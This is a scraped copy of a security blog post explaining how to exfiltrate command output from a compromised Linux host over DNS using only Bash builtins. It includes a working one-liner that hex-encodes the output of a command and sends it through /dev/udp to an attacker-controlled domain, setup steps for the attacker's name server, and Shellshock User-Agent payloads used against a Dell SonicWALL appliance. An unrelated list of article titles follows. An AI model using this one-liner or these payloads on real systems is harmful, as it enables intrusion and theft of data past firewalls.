Bash data exfiltration through DNS (using bash builtin functions)
来源:互联网 发布:韩日军力对比知乎 编辑:程序博客网 时间:2024/04/27 09:49
https://forsec.nl/2015/01/bash-data-exfiltration-through-dns-using-bash-builtin-functions/
After gaining ‘blind’ command execution access to a compromised Linux host, data exfiltration can be difficult when the system is protected by a firewall. Sometimes these firewalls prevent the compromised host to establish connections to the internet. In these cases, data exfiltration through the DNS-protocol can be useful. In a lot of cases DNS-queries are not blocked by a firewall. I’ve had a real life situation like this, which i will describe later on.
There are several oneliners on the internet available to exfiltrate command output through DNS. However, i noticed that these are using Linux applications (xxd, od, hexdump, etc), which are not always present on a minimalistic target system. I decided to create a oneliner, which is only using Bash builtin functionalities. The oneliner can be used whenever command execution is possible and Bash is installed on the compromised system.
I’ve created the following bash command line which can be used on the attacked system to execute commands and send the results through DNS:
(LINE=`id`;domain=yourdomain.com;var=;while IFS= read -r -n 1 char;do var+=$(printf %02X "'${char:-$'\n'}'");done<<<$LINE;e=60;l=${#var};for((b=0;b<l;b+=60))do>&/dev/udp/$RANDOM.$b.${var:$b:$e}.$domain/53 0>&1;done;>&/dev/udp/$RANDOM.theend.$domain/53 0>&1)
In order to use it, first modify the name servers of your domain, point them to the ip-address of the attacker machine. Also two values in the above oneliner need to be changed. The variable “LINE” needs to contain the command to execute, for example “ls -l /”. Also the variable “domain” needs to be modified, replace it with the domain which is pointed to your attacker machine. On the attacker machine, the following server side ruby script can be started:
dns.rb
The script will retrieve the output of the executed command. The following screenshot shows the command executed on a targeted system:
This screenshot shows the retrieved data by the attacker, using the dns.rb script:
There might be improvements possible to the oneliner and script to make it more efficient. Or there might be some cases where the oneliner doesn’t work. Do not hesitate to comment on this blog if you have an improvement.
Real life scenario
I stumbled on a Dell SonicWALL Secure Remote Access (SRA) appliance which was vulnerable to Shellshock. I discovered this by sending the following user-agent, which returned a 200 HTTP response.
User-agent: () { :; }; /bin/ls
When sending a user-agent with a non-existing binary, it returned a 500 HTTP response, which indicates something went wrong (it cannot execute the defined binary):
User-agent () { :;}; /bin/fake
I was able to execute commands using the Shellshock vulnerability (confirmed by running /bin/sleep 60), however it was not responding with the command output on commands like ‘ls’. I discovered that all outgoing connections to the internet were blocked by the machine, only the DNS protocol was allowed, by resolving a hostname using the telnet executable. The appliance did not have any executables like xxd, hexdump etc. Therefor i decided to create the above line, which is not depending on these utilities, so can be used on any system containing Bash.
Dell is already aware of the Shellshock vulnerability in the older firmware versions of SRA. More details on how to patch the issue can be found at:
https://support.software.dell.com/product-notification/133206?productName=SonicWALL%20SRA%20Series
- Bash data exfiltration through DNS (using bash builtin functions)
- [Python]Import: Using Non-Builtin Functions
- Common functions for BASH SCRIPT
- Returning Values from Bash Functions
- Returning Values from Bash Functions
- Using Bash Shell
- Bash Redirections Using Exec
- Real world examples of malware using DNS for exfiltration and C&C channels
- BASH 脚本命令查找顺序及command builtin enable
- bash [[: not found, '[[' is a keyword not a builtin
- 【Bash百宝箱】shell内建命令之builtin、command、caller
- bash
- .bash
- bash
- bash
- bash
- bash
- bash
- 水仙花数——升级版
- Openfire3.9.3源代码导入eclipse中开发配置指南
- 【bzoj 3630】: [JLOI2014]镜面通道
- Ubuntu中安装Matlab(添加Dash快捷方式)
- Ubuntu下Nautilus中用mplayer生成视频缩略图的方法
- Bash data exfiltration through DNS (using bash builtin functions)
- 字串统计
- Spring——IOC(四)
- The Unique MST(次小生成树问题)
- 进入centos命令行的方式
- BTEA算法C语言实现
- 【IOS学习笔记(一)】IOS中.h和.m文件中的变量和方法
- 【操作系统】1、操作系统概述
- Java虚拟机(二):Java常见内存溢出异常分析